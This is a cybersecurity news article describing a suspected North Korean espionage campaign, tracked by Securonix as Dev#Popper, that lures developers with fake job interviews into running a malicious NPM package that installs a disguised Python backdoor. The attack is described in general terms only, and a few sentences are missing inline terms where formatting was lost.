Fraud Management & Cybercrime
,
Social Engineering
North Korean Prediliction for Elaborate Social Engineering Attacks Strikes Again
Likely North Korean threat actors are using fake job interviews to trick software developers into downloading disguised Python backdoors as part of an ongoing espionage campaign.
See Also: OnDemand | Human Detection & Response: Exploring Three Security Awareness Realities
The attackers construct fake job interview scenarios designed to appear legitimate and enticing to developers seeking employment opportunities.
Once a victim has been lured in, the attackers instruct them to download seemingly harmless files from GitHub repositories, purportedly as part of the interview process, according to a report from Securonix, which is tracking the campaign as Dev#Popper.
Pyongyang hackers have a history of constructing elaborate social engineering ruses to infect computers that belong to security researchers and tech workers, including by masquerading as recruiters on LinkedIn and sending phishing emails purportedly containing job offers (see: North Korean Hackers Find Value in LinkedIn).
This suspected North Korean attack involves deployment of a deceptive Node Package Manager package that seems innocuous at first glance. On execution, it triggers the infiltration of the victim’s system. Following the initial stage, hackers install a Python-based remote access Trojan.
The backdoor provides the attackers with unfettered access to sensitive information and system resources, posing a threat to individual developers and the organizations they work for.
What sets this campaign apart is its exploitation of the inherent trust developers place in the job application process. While the GitHub repositories associated with the attack may have been removed, the threat persists, researchers said.
Later-Stage Campaign Details
The Node Package Manager package provided by the attacker includes files that mimic legitimate development tools, such as
On executing the downloaded NPM package, the malicious JavaScript code within it is activated through the Node.js
process. This code serves as a gateway for further infiltration, initiating the next stages of the attack.
The JavaScript code downloads and extracts an archive file, which contains a disguised Python backdoor in the form of a hidden .npl
file. The file, labeled as a Python file, employs string manipulation and decoding techniques to hide its true nature.
The Python code within the backdoor establishes communication with a command-and-control server controlled by the attackers.
The Python backdoor executes additional malicious scripts, such as a file labeled pay
within the .n2
directory. These scripts carry out various malicious activities, including data exfiltration, system reconnaissance, and remote command execution.
The attackers gain persistent access to compromised systems, allowing them to exfiltrate sensitive data, install additional malware or further exploit the compromised environment.